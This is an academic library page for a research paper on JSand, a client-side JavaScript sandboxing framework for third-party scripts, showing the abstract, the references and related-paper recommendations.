ABSTRACT
The inclusion of third-party scripts in web pages is a common practice. A recent study has shown that more than half of the Alexa top 10000 sites include scripts from more than 5 different origins. However, such script inclusions carry risks, as the included scripts operate with the privileges of the including website.
We propose JSand, a server-driven but client-side JavaScript sandboxing framework. JSand requires no browser modifications: the sandboxing framework is implemented in JavaScript and is delivered to the browser by the websites that use it. Enforcement is done entirely at the client side: JSand enforces a server-specified policy on included scripts without requiring server-side filtering or rewriting of scripts. Most importantly, JSand is complete: access to all resources is mediated by the sandbox.
We describe the design and implementation of JSand, and we show that it is secure, backwards compatible, and that it performs sufficiently well.
- R. Berjon. W3C HTML5 Working Draft. http://www.w3.org/TR/html5/, September 2012.Google Scholar
- BuiltWith. jQuery Usage Statistics. http://trends.builtwith.com/javascript/jQuery.Google Scholar
- D. Crockford. ADsafe -- making JavaScript safe for advertising. http://adsafe.org/.Google Scholar
- T. V. Cutsem and M. S. Miller. On the Design of the ECMAScript Reflection API. Technical Report VUB-SOFT-TR-12-03, Department of Computer Science, Vrije Universiteit Brussel, February 2012.Google Scholar
- W. De Groef, D. Devriese, N. Nikiforakis, and F. Piessens. FlowFox: a web browser with flexible and precise information flow control. In Proc. of CCS'12. ACM, 2012. Google ScholarDigital Library
- P. De Ryck, M. Decat, L. Desmet, F. Piessens, and W. Joosen. Security of web mashups: a survey. In Proc. of NordSec'10. Springer, 2011. Google ScholarDigital Library
- D. Devriese and F. Piessens. Noninterference through secure multi-execution. In Proc of SP'10, IEEE, pages 109--124, Washington, DC, USA, 2010. Google ScholarDigital Library
- M. Heiderich. Locking the Throne Room - How ES5+ will change XSS and Client Side Security. http://www.slideshare.net/x00mario/locking-the-throneroom-20, November 2011.Google Scholar
- Jacaranda. Jacaranda. http://jacaranda.org.Google Scholar
- T. Jim, N. Swamy, and M. Hicks. Defeating Script Injection Attacks with Browser-Enforced Embedded Policies. In Proc. of WWW'07, pages 601--610, New York, NY, USA, 2007. ACM. Google ScholarDigital Library
- John Resig. Pure JavaScript HTML Parser. http://ejohn.org/blog/pure-javascript-html-parser/.Google Scholar
- A. Klein. DOM Based Cross Site Scripting or XSS of the Third Kind. http://www.webappsec.org/projects/articles/071105.shtml, April 2005.Google Scholar
- T. Luo and W. Du. Contego: capability-based access control for web browsers. TRUST'11, pages 231--238, Berlin, Heidelberg, 2011. Springer-Verlag. Google ScholarDigital Library
- S. Maffeis, J. Mitchell, and A. Taly. Object capabilities and isolation of untrusted web applications. In Proc. of SP'10. IEEE, 2010. Google ScholarDigital Library
- S. Maffeis and A. Taly. Language-based isolation of untrusted Javascript. In Proc. of CSF'09, IEEE, 2009. Google ScholarDigital Library
- J. Magazinius, P. Phung, and D. Sands. Safe wrappers and sane policies for self protecting JavaScript. In Proc. of Nordsec'10, 2010. Google ScholarDigital Library
- L. Meyerovich and B. Livshits. ConScript: Specifying and enforcing fine-grained security policies for Javascript in the browser. In Proc. of SP'10, 2010. Google ScholarDigital Library
- Microsoft Live Labs. Live Labs Websandbox. http://websandbox.org.Google Scholar
- Mihai Bazon. UglifyJS. https://github.com/mishoo/UglifyJS/.Google Scholar
- M. S. Miller. Secure EcmaScript 5. http://code.google.com/p/es-lab/wiki/SecureEcmaScript.Google Scholar
- M. S. Miller. Robust composition: towards a unified approach to access control and concurrency control. PhD thesis, Johns Hopkins University, Baltimore, MD, USA, 2006. AAI3245526. Google ScholarDigital Library
- M. S. Miller, M. Samuel, B. Laurie, I. Awad, and M. Stay. Caja - safe active content in sanitized JavaScript. Technical report, Google Inc., June 2008.Google Scholar
- N. Nikiforakis, L. Invernizzi, A. Kapravelos, S. Van Acker, W. Joosen, C. Kruegel, F. Piessens, and G. Vigna. You are what you include: Large-scale evaluation of remote JavaScript inclusions. In Proc. of CCS'12, October 2012. Google ScholarDigital Library
- NoMoreSleep. jquery-geolocation.http://code.google.com/p/jquery-geolocation/.Google Scholar
- P. H. Phung and L. Desmet. A two-tier sandbox architecture for untrusted javascript. In Proc. of JSTools'12, pages 1--10, New York, NY, 2012. ACM. Google ScholarDigital Library
- P. H. Phung, D. Sands, and A. Chudnov. Lightweight self-protecting JavaScript. ASIACCS '09, pages 47--60, New York, NY, USA, 2009. ACM. Google ScholarDigital Library
- J. G. Politz, S. A. Eliopoulos, A. Guha, and S. Krishnamurthi. ADsafety: type-based verification of JavaScript Sandboxing. In Proc. of USENIX'11, SEC'11, pages 12--12, Berkeley, CA, USA, 2011. Google ScholarDigital Library
- Programmable Web. Keeping you up to date with APIs, mashups and the Web as platform. http://www.programmableweb.com/.Google Scholar
- C. Reis, J. Dunagan, H. J. Wang, O. Dubrovsky, and S. Esmeir. BrowserShield: vulnerability-driven filtering of dynamic HTML. In Proc. of OSDI'06, pages 61--74, Berkeley, CA, USA, 2006. USENIX Association. Google ScholarDigital Library
- SANS Institute. SANS: Top Cyber Security Risks. http://www.sans.org/top-cyber-security-risks/, 2009.Google Scholar
- S. Stamm, B. Sterne, and G. Markham. Reining in the web with content security policy. In Proc. of WWW'10, pages 921--930, New York, NY, 2010. ACM. Google ScholarDigital Library
- M. Ter Louw, K. T. Ganesh, and V. Venkatakrishnan. AdJail: Practical Enforcement of Confidentiality and Integrity Policies on Web Advertisements. In 19th USENIX Security Symposium, Aug. 2010. Google ScholarDigital Library
- The FaceBook Team. FBJS. http://wiki.developers.facebook.com/index.php/FBJS.Google Scholar
- S. Van Acker, P. De Ryck, L. Desmet, F. Piessens, and W. Joosen. WebJail: least-privilege integration of third-party components in web mashups. ACSAC '11, pages 307--316, New York, NY, USA, 2011. ACM. Google ScholarDigital Library
- T. Van Cutsem and M. S. Miller. Proxies: design principles for robust object-oriented intercession APIs. SIGPLAN Not., 45(12): 59--72, Oct. 2010. Google ScholarDigital Library
- W3C. Document Object Model (DOM) Technical Reports. http://www.w3.org/DOM/DOMTR.Google Scholar
- W3C. W3C Standards and drafts - Cross-Origin Resource Sharing. http://www.w3.org/TR/cors/.Google Scholar
- W3C. W3C Standards and drafts - Uniform Messaging Policy, Level One. http://www.w3.org/TR/UMP/.Google Scholar
- Yahoo! Developer Network. JavaScript: Use a Web Proxy for Cross-Domain XMLHttpRequest Calls. http://developer.yahoo.com/javascript/howto-proxy.html.Google Scholar
- C. Yue and H. Wang. Characterizing Insecure JavaScript Practices on the Web. In Proc. of WWW'09, pages 961--961, April 2009. Google ScholarDigital Library
- M. Zalewski. Browser Security Handbook. http://code.google.com/p/browsersec/wiki/Main.Google Scholar
Index Terms
- JSand: complete client-side sandboxing of third-party JavaScript without browser modifications
Recommendations
A two-tier sandbox architecture for untrusted JavaScript
JSTools '12: Proceedings of the Workshop on JavaScript ToolsThe large majority of websites nowadays embeds third-party JavaScript into their pages, coming from external partners. Ideally, these scripts are benign and come from trusted sources, but over time, these third-party scripts can start to misbehave, or ...
WebJail: least-privilege integration of third-party components in web mashups
ACSAC '11: Proceedings of the 27th Annual Computer Security Applications ConferenceIn the last decade, the Internet landscape has transformed from a mostly static world into Web 2.0, where the use of web applications and mashups has become a daily routine for many Internet users. Web mashups are web applications that combine data and ...
Efficient suspicious URL filtering based on-reputation
Enormous web pages are visited each day over a network and malicious websites might infect user machines. To identify malicious web sites, the most reliable approach is honeypot, an execution-based method. The vast amount of http traffic makes ...
Comments